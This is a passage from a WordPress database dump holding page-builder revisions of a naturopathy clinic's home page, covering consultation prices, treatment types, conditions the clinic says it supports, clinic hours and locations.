scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037.jpg\" _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"IMG_20210701_202413_037\" hover_enabled=\"0\" sticky_enabled=\"0\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: Montserrat;\">Prescribed treatments such as herbal medicine, nutritional supplements, creams or flower essences may also form part of your treatment plan. Lifestyle and dietary recommendations will also be included.</span></p>\n<p><span style=\"font-family: Montserrat;\">Pathology testing or referrals may be recommended.</span><span style=\"font-family: Montserrat;\"></span></p>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Follow-up consult (45 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on.</span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>\n<p><br /><span style=\"font-family: Montserrat;\"></span></p>\n<p><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"0px||0px||true|false\" custom_padding_last_edited=\"on|phone\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies, emotional health issues or script reviews. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ffffff\" max_width=\"1082px\" module_alignment=\"center\" custom_padding=\"0px||0px||false|false\" border_width_all=\"1px\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" _module_preset=\"default\" text_font=\"Montserrat||||||||\" background_color=\"#ffffff\" custom_padding=\"10px||10px||false|false\"]<p style=\"text-align: center;\"><span style=\"font-size: large;\">Discounts available for children under 12, students and seniors</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span>\nCapsules/tablets<span style=\"font-family: Montserrat;\"></span>\nTeas\nTopical creams\n [/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Food as medicine</span>\n<span style=\"font-family: Montserrat;\">Nutritional compounds</span>\n<span style=\"font-family: Montserrat;\">Supplements</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/1-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat;\">Stress strategies</span>\n<span style=\"font-family: Montserrat;\">Exercise and movement</span>\n<span style=\"font-family: Montserrat;\">Mindfulness </span>\n<span style=\"font-family: Montserrat;\">Sleep support</span>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<span style=\"font-family: Montserrat; font-weight:;\">Flower essences </span>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_color_all=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" border_color_left=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" inline_fonts=\"Playfair Display\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22border_color_all%22,%22border_color_left%22%93}\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" custom_padding=\"||3px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\">Location</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda & Mundaring</span><br /><span style=\"font-family: Montserrat;\">Online consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_url=\"https://verdenaturopathy.com.au/bookings\" button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#000000\" button_bg_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" button_border_width=\"2px\" button_border_color=\"#000000\" button_border_radius=\"50px\" button_font=\"Montserrat|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22button_bg_color%22%93}\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><strong><span style=\"font-family: \'Playfair Display\';\"></span></strong></h3>\n<h3><strong><span style=\"font-family: \'Playfair Display\';\">Clinic Hours</span></strong></h3>\n<p><span style=\"font-family: Montserrat;\">Tues/Wed: 9am-6pm</span><br /><span style=\"font-family: Montserrat;\">Thurs: 9am-7pm</span><br /><span style=\"font-family: Montserrat;\">Saturday: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-08-22 16:34:28','2021-08-22 08:34:28','',28,'https://verdenaturopathy.com.au/?p=351',0,'revision','',0),(348,1,'2021-08-22 16:31:07','2021-08-22 08:31:07','','IMG_20210701_202413_037','','inherit','open','closed','','img_20210701_202413_037-4','','','2021-08-22 16:31:07','2021-08-22 08:31:07','',0,'https://verdenaturopathy.com.au/wp-content/uploads/2021/08/IMG_20210701_202413_037-3.jpg',0,'attachment','image/jpeg',0),(349,1,'2021-08-22 16:31:11','2021-08-22 08:31:11','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||42px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\" hover_enabled=\"0\" custom_padding=\"||27px|||\" sticky_enabled=\"0\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.9.4\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic health approach</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" hover_enabled=\"0\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\"]<p><span style=\"font-family: Montserrat;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by six naturopathic principles, utilising these to form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>We can support health in many conditions, including:</span></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat;\"><span>gastrointestinal issues (IBS, IBD, GORD, bloating, poor digestion)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>nervous system imbalance (anxiety, low mood, stress, poor sleep)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>metabolic dysfunction (insulin resistance)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>immune dysfunction (autoimmunity, recurrent infections)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>thyroid conditions (hyper/hypothyroidism)</span></span><span style=\"font-family: Montserrat;\"><span></span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>hormonal imbalance (PCOS, endometriosis, PMS, menopause, period abnormalities)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>cardiovascular health (chronic inflammation, high cholesterol)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>men\'s health (prostate issues, sexual health)</span></span></li>\n<li><span style=\"font-family: Montserrat;\"><span>children\'s health (poor immunity, digestive issues, behavioural issues)</span></span></li>\n</ul>\n<p><span style=\"font-family: Montserrat;\"><span>Our approach is holistic; we encourage collaboration with both conventional and complementary medicine practitioners to ensure you are supported along your health journey.</span></span><span style=\"font-family: Montserrat;\"><span></span></span></p>\n<p><span style=\"font-family: Montserrat;\"><span>We offer free 15-min chats to help you decide if naturopathy is right for you; please contact us to schedule a call. </span></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\" hover_enabled=\"0\" custom_css_main_element=\"||||\" box_shadow_style=\"preset2\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\" sticky_enabled=\"0\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20210503_205936_105.jpg\" title_text=\"IMG_20210503_205936_105\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|75|75|100|1|0|-1\"][/et_pb_image][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/IMG_20200714_175859_865.jpg\" title_text=\"IMG_20200714_175859_865\" _builder_version=\"4.9.4\" _module_preset=\"default\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|26|26|100|1|0|-1\"][/et_pb_image][et_pb_image _builder_version=\"4.9.4\" _module_preset=\"default\" title_text=\"IMG_20210701_202413_037\" hover_enabled=\"0\" sticky_enabled=\"0\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature\" _builder_version=\"4.9.4\" background_image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-53.jpg\" background_size=\"initial\" custom_padding=\"7px|||||\"][et_pb_row _builder_version=\"4.9.4\" _module_preset=\"default\" custom_margin=\"||||false|false\"][et_pb_column type=\"4_4\" _builder_version=\"4.9.4\" _module_preset=\"default\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Consultations</span></h2>\n<p><span style=\"font-size: x-large; font-family: Montserrat;\">Choose from face-to-face or online consults</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" module_alignment=\"center\" custom_margin=\"||||false|false\" custom_padding=\"0px|0px|0px|0px|true|false\" border_radii=\"off||||\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" _module_preset=\"default\" custom_padding=\"|0px||0px|false|false\"][et_pb_image src=\"https://verdenaturopathy.com.au/wp-content/uploads/2021/05/4-01.png\" title_text=\"4-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" height=\"140px\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Initial consult (75 min) - $120\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" custom_padding=\"10px|10px|10px|10px|false|false\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat;\">An in-depth dive into your presenting complaint, health history, diet and lifestyle. This time will allow us to formulate a patient-centric treatment plan taking into account your health goals, priorities and budget. </span></p>\n<p><span style=\"font-family: 